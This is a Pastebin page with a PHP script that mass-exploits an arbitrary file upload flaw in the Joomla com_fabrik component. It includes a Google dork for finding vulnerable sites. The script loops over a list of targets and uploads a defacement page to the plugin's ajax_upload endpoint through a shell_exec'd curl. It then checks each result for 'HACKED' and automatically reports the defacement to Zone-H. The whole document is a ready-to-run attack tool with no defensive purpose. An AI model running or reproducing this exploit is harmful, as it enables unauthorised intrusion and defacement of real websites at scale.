Advertisement
AgusSR

Joomla Component com_fabrik Arbitrary FIle Upload

Dec 12th, 2017
3,847
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.76 KB | None | 0 0
  1. <?php
  2.  
  3. /**
  4.  
  5. Joomla Component com_fabrik Arbitrary File Upload
  6. Author: Et04 & bL@cKID
  7.  
  8. Google Dork
  9. inurl:/index.php?option=com_fabrik
  10.  
  11. Auto Exploiter (Auto Upload & Auto Submit Zone-H)
  12. Coded by: L0c4lh34rtz - IndoXploit
  13. */
  14.  
  15. Class IDX_Fabrik {
  16.     public $url;
  17.  
  18.     /* File deface anda dalam folder yang sama dengan tools ini */
  19.     private $file = "index.htm";
  20.  
  21.     /* Nick Hacker Kalian / Nick Zone -H Kalian */
  22.     /* Pastikan dalam script deface kalian terdapat kata HACKED */
  23.     public $hacker  = "L0c4lh34rtz";
  24.  
  25.     public function __construct() {
  26.         if(!file_exists(getcwd()."/".$this->file)) die("!! File ".$this->file." tidak ditemukan !!");
  27.     }
  28.  
  29.     public function validUrl() {
  30.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  31.             $url = "http://".$this->url;
  32.             return $url;
  33.         } else {
  34.             return $this->url;
  35.         }
  36.     }
  37.  
  38.     public function curl($url, $data = null, $headers = null, $cookie = true) {
  39.         $ch = curl_init();
  40.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  41.               curl_setopt($ch, CURLOPT_URL, $url);
  42.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
  43.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
  44.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  45.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  46.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  47.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  48.  
  49.         if($data !== null) {
  50.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  51.               curl_setopt($ch, CURLOPT_POST, TRUE);
  52.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  53.         }
  54.  
  55.         if($headers !== null) {
  56.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  57.         }
  58.  
  59.         if($cookie === true) {
  60.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
  61.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  62.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  63.         }
  64.  
  65.         $exec = curl_exec($ch);
  66.         $info = curl_getinfo($ch);
  67.  
  68.               curl_close($ch);
  69.  
  70.         return (object) [
  71.             "response"  => $exec,
  72.             "info"      => $info
  73.         ];
  74.  
  75.     }
  76.  
  77.     public function exploit() {
  78.         $url  = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  79.         //$post = $this->curl($url, ["file" => "@L0c.htm"], null, false);
  80.         $post = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$url\"");
  81.         $result = (object) json_decode($post, true);
  82.  
  83.         if(isset($result->error)) {
  84.             print "[-] ".parse_url($this->url, PHP_URL_HOST)." [FAILED]\n";
  85.         } else {
  86.             if(isset($result->uri)) {
  87.                 if(preg_match("/hacked/i", $this->curl($result->uri)->response)) {
  88.                     print "[+] ".$result->uri." [OK]\n";
  89.                     $this->zoneh($result->uri);
  90.                     $this->save($result->uri);
  91.                 }
  92.             }
  93.         }
  94.     }
  95.  
  96.     public function zoneh($url) {
  97.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
  98.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
  99.             if($matches[1] === "ERROR") {
  100.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
  101.                 print "[-] Zone-H ($url) [ERROR: ".$matches2[1]."]\n\n";
  102.             } else {
  103.                 print "[+] Zone-H ($url) [OK]\n\n";
  104.             }
  105.         }
  106.     }
  107.  
  108.     public function save($isi) {
  109.         $handle = fopen("result_fabrik.txt", "a+");
  110.         fwrite($handle, "$isi\n");
  111.         fclose($handle);
  112.     }
  113.  
  114. }
  115.  
  116. $fabrik = new IDX_Fabrik();
  117.  
  118. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
  119. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
  120. $open = explode("\n", file_get_contents($argv[1]));
  121.  
  122. foreach($open as $list) {
  123.     $fabrik->url = trim($list);
  124.     $fabrik->url = $fabrik->validUrl();
  125.  
  126.     print "[*] Exploiting ".parse_url($fabrik->url, PHP_URL_HOST)."\n";
  127.     $fabrik->exploit();
  128. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement